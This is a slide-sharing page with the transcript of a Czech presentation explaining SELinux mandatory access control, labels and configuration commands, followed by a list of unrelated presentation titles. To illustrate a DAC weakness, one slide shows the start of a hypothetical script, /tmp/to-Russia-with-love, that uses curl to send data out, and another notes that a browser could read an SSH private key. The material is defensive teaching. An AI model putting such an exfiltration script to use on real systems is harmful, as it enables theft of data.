Se SELinuxem bezpečně Matěj Cepl Desktop Bugzapper – Red Hat, Inc. This presentation is made available under a Creative Commons Attribution-ShareAlike.

Slides:



Advertisements
Podobné prezentace
V této lekci se budeme brouzdat adresáři.
Advertisements

21. okruh GNU/Linux uživatelské účty, přístupová práva GUI, architektura X Windows, správce oken.
Windows 8 ZMVS. Windows 8 Nové 3D uživatelské rozhraní s kódovým názvem Wind. Nové uživatelské rozhraní bude požadovat minimálně 170MB video paměti a.
Exchange 2013 – Autodiscover - přehled
SOFTWARE operační systémy
Přednáška č. 5 Proces návrhu databáze
Bezpečnost v Linuxu Zpracoval: Roman Danel. Balíčkovací systém Způsob distribuce SW Ošetřuje a řeší závislosti Díky „podepisování“ balíčků nehrozí podstrčení.
ZMVŠ. Bezpečnost Windows 8 Dynamic Access Control (DAC) Volně – Dynamický kontrolní přístup) rozšíření NTFS access control listů (ACL) o složitá pravidla.
Tvorba webových aplikací
Co je Linux? Základní pojmy
Přístupová práva, maska přístupových práv Jiří Hořejší.
Gymnázium, SOŠ a VOŠ Ledeč nad Sázavou I NFORMAČNÍ A KOMUNIKAČNÍ TECHNOLOGIE Ing. Jan Roubíček.
Adresářová služba Active directory
Maturitní okruh č. 7. Odstínit aplikace od specifik HWSpráva procesůSpráva pamětiSpráva souborůSpráva vstupů a výstupůSpráva sítěSystém ochrany a bezpečnostiSystém.
Zálohování a Disaster Recovery pro školy Aleš Hok
VLAN Projektování distribuovaných systémů Lekce 2 Ing. Jiří ledvina, CSc.
Příkazový řádek CMD.
PHP – Základy programování
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Operating Systems Networking for Home and Small Businesses – Chapter.
Operační systémy.
Serverové systémy Windows
Oprávnění uživatelů ke složkám Centrum pro virtuální a moderní metody a formy vzdělávání na Obchodní akademii T.G. Masaryka, Kostelec nad Orlicí.
Lokální počítačové sítě Novell Netware Ing. Zdeněk Votruba Úvod do síťového operačního systému Novell Netware.
Jazyk PHP Programovací jazyk PHP (Hypertext preprocessor) je skriptovací jazyk, který běží na straně serveru. KLIENT - SERVER Server posílá do vašeho počítače.
Gymnázium, SOŠ a VOŠ Ledeč nad Sázavou I NFORMAČNÍ A KOMUNIKAČNÍ TECHNOLOGIE Ing. Jan Roubíček.
Gymnázium, SOŠ a VOŠ Ledeč nad Sázavou I NFORMAČNÍ A KOMUNIKAČNÍ TECHNOLOGIE Ing. Jan Roubíček.
Firewall.
Aplikační role Vít Ochozka. K čemu nám slouží Omezit přístup k databázi AKORD jen prostřednictvím konkrétní aplikace Jiné aplikace – MS excel, MS access,
LINUX - UBUNTU Roman Danel VŠB TU Ostrava, HGF. Informace $ man příkaz $ info příkaz $ apropos subject.
Active Directory Centrum pro virtuální a moderní metody a formy vzdělávání na Obchodní akademii T.G. Masaryka, Kostelec nad Orlicí Autor:
Operační systémy Mgr. Ludmila Faltýnková EU OPVK ICT2-4/Inf12 Základní škola Olomouc, Heyrovského 33 Určeno pouze pro výuku Žádná část ani celek nesmí.
Orbis pictus 21. století Tato prezentace byla vytvořena v rámci projektu.
SAMBA umožňuje linuxovému systému sdílení prostředků a služeb prostřednictvím sítě používá SMB (server message block) protocol - identický protokolu.
1 Seminář 9 MAC adresa – fyzická adresa interface (rozhraní) Je zapsána v síťové kartě. Je identifikátor uzlu na spoji. MAC adresu v paketu čte switch.
Digitální výukový materiál zpracovaný v rámci projektu „EU peníze školám“ Projekt:CZ.1.07/1.5.00/ „SŠHL Frýdlant.moderní školy“ Škola:Střední škola.
Operační systémy Název a adresa školy
Seminář 12 Obsah cvičení Transportní služby Utilita nestat
Operační systém GNU Linux
Přístup k databázím z WWW PHP+MySQL. Síť WWW je v současné době místem pro dynamické, často databázemi řízené webové aplikace. Tvorba webového serveru.
Systém souborů. Množina souborů různých typů – Data – Spustitelné programy – Konfigurační a pomocné informace – I/O zařízení Způsob organizace množiny.
OPERAČNÍ SYSTÉMY.
Blíží se datové schránky,. aneb „Nepropadejte panice!“
Doména Windows Serveru Centrum pro virtuální a moderní metody a formy vzdělávání na Obchodní akademii T.G. Masaryka, Kostelec nad Orlicí Autor:
Operační systém GNU Linux Příkazy pro práci se soubory.
LINUX Úvod do administrace Roman Danel VŠB TU Ostrava, Hornicko – geologická fakulta.
Linux - Windows. Alternativní SW Office: OpenOffice - LibreOffice - Koffice - GNOME.
OPERAČNÍ SYSTÉM.
Identity na ČVUT ČVUT - Výpočetní a informační centrum Ing. Petr Zácha, Ph.D.
Linux seminář, Tomáš Davídek 1 Speciální Debian balíčky pro ÚČJF Tomáš.
Počítačová bezpečnost 2. Bezpečnost v OS © Milan Keršlágerhttp:// Obsah: ● jádro,
Name of Presentation Red Hat Presenter Red Hat Czech Red Hat Enterprise Linux a Fedora Matěj Cepl Štěpán Kasal.
FTP-SSL FTP-SSL Martin Dušek Martin Fúsek Josef Vlček.
BEZPEČNOSTNÍ TECHNOLOGIE I Operační program Vzdělávání pro konkurenceschopnost Projekt: Vzdělávání pro bezpečnostní systém státu (reg. č.: CZ.1.01/2.2.00/ )
SOFTWARE Operační systémy.
Vypracoval / Roman Málek
Služby Windows Autorem materiálu a všech jeho částí, není-li uvedeno jinak, je Ing. Libor Otáhalík. Dostupné z Metodického portálu ISSN: 
Vlastnosti souborů Jaroslava Černá.
NÁZEV ŠKOLY: S0Š Net Office, spol. s r.o, Orlová Lutyně
Operační systémy - úvod
Počítačová bezpečnost 2. Bezpečnost v OS
Identity management v UIS
Operační systém GNU Linux
1. ročník oboru Mechanik opravář motorových vozidel
Otázky a úkoly VY_32_INOVACE_4_2_12_20 Stav počítače   Patří do spuštění počítače spuštění programu Kreslení? Je třeba pro vypnutí počítače vypnout spuštěné.
Linux-příkazový řádek
Operační systémy.
Správa disků
Windows Server 2008 Centrum pro virtuální a moderní metody a formy vzdělávání na Obchodní akademii T.G. Masaryka, Kostelec nad Orlicí Autor:
Práce s procesy Centrum pro virtuální a moderní metody a formy vzdělávání na Obchodní akademii T.G. Masaryka, Kostelec nad Orlicí Autor:
Desktopové aplikace na .NET Core
Transkript prezentace:

Se SELinuxem bezpečně Matěj Cepl Desktop Bugzapper – Red Hat, Inc. This presentation is made available under a Creative Commons Attribution-ShareAlike (BY-SA) 3.0 license.

Access Control Řízení přístupu (Access Control) V současné době Linux (a Unixy obecně) podporují DAC (Discretionary Access Control) Práva programu se řídí výlučně právem uživatele, který ho spustil.

Co funguje Nejnebezpečnější informace jsou chráněny: např. skripty spuštěné z Apache nemůžou číst /etc/shadow nebo normální uživatel nemá přístup k /var/log/secure. Uživatelé si nemohou navzájem číst svoje /home adresáře.

Co nefunguje NEDOSTATEČNÁ GRANULARITA! NEDOSTATEČNÁ GRANULARITA! – Všemocný root (jestliže se cracker stane rootem, obrana v podstatě skončila) – Práva pro aplikaci === práva uživatele – Není menší granularita nežli uživatel – Omezeno jenom na soubory Do souboru /etc/shadow smí zapisovat jenom program login, ale pouze pokud je spuštěn uživatelem root z programu passwd, ani root, ani login program ale do něho jinak zapisovat nesmí.

Co nefunguje (2) Takže třeba, co může Firefox číst? kmacmill firefox-bin -rw kmacmill kmacmill.ssh/id_rsa (třeba flash ve Firefoxu) Nebo...

Co nefunguje (3) Může Apache zapsat a spustit tento skript? -rwxr-xr-x nobody /tmp/to-Russia-with-love a copak je v něm? $ cat /tmp/to-Russia-with-love #!/bin/sh curl --data \

Krátká historie SELinuxu Interní projekty NSA na vytvoření MAC systémů, type enforcement, RBAC a MLS – zveřejněna patch pro Linux 2003 – začleněna do kernelu test3. Květen 2004 – součástí Fedora Core 2 – naprostý neúspěch (strict policy) Listopad 2004 – Fedora Core 3 – targeted policy (defaultuje do unconfined )

Mandatory Access Control Základem všeho jsou značky (u souborů xattr, proto je nutno pamatovat na zálohování) johanka:~$ ls -lZ /etc/resolv.conf -rw-r--r--. root root system_u:object_r:net_conf_t:s0 /etc/resolv.conf johanka:~$ User, role, type, úroveň v MLS Podobně pro uživatele a další objekty systému johanka:~$ id -Z staff_u:staff_r:staff_t:s0-s0:c0.c1023 johanka:~$

Současný SELinux Default SELinuxu je strict, ALE … … téměř vše unconfined – není rozdílu od situaci, kdy by SELinux nebyl. Pouze vyjmenované služby jsou confined. Jenom asi padesát programů vůbec ví o existenci SELinuxu. V posledních verzích Fedory pozvolný návrat ke klientským confined procesům (flash, sandbox, xguest).

Příklad Apache Samotný Apache program nebyl změněn. Správce systému má tři možnosti nastavení: zobrazovat soubory z ~/public_html a spouštět skripty? Cracker může jenom to, co Apache. Jestli Apache může pouze číst z /var/www/html, tak to je vše. Např. nemůže spouštět žádné skripty (nikdy, to nelze nastavit) z jiných adresářů nežli pro to označených.

Jak dopadnout špatně vim ~/resolv.conf mv ~/resolv.conf /etc ls -lZ /etc/resolv.conf Confined domény budou hlásit chyby přístupu k user_home_t restorecon /etc/resolv.conf

Základní fígly Na novém disku nebo při vypnutém SELinuxu # touch /.autorelabel ; reboot V případě problémů s labely # restorecon -v -R (mimochodem, restorecond(8) běží v pozadí)

Konfigurace (1) $ ssh -p 785 ssh(1) je pochopitelně jednou z nejostřeji chráněných aplikací. # semanage port -a -t ssh_port_t -p tcp 785

Konfigurace (2) Mnohá nastavení SELinuxu jsou ovlivnitelná pomocí SE booleans(8), nastavení která ovlivňují některé části policy. # getsebool -a|grep sftp sftp_enable_homedirs --> off sftpd_anon_write --> off sftpd_full_access --> off sftpd_write_ssh_home --> off

Konfigurace (3)

Další projekty Jemné rozdělení práv v SELinuxu na každý objekt je využíváno i v jiných projektech: ● SE-PostgreSQL – MAC na databázových objektech, granularita ● SVirt – Confined (spoutané?) virtuální stroje

Další informace SELinux by Example, Prentice Hall 2006 Blog Dana Walshe Česká dokumentace pro SELinux (bakalářská práce Jana Horáka na IS MUNI), Česká dokumentace pro SELinux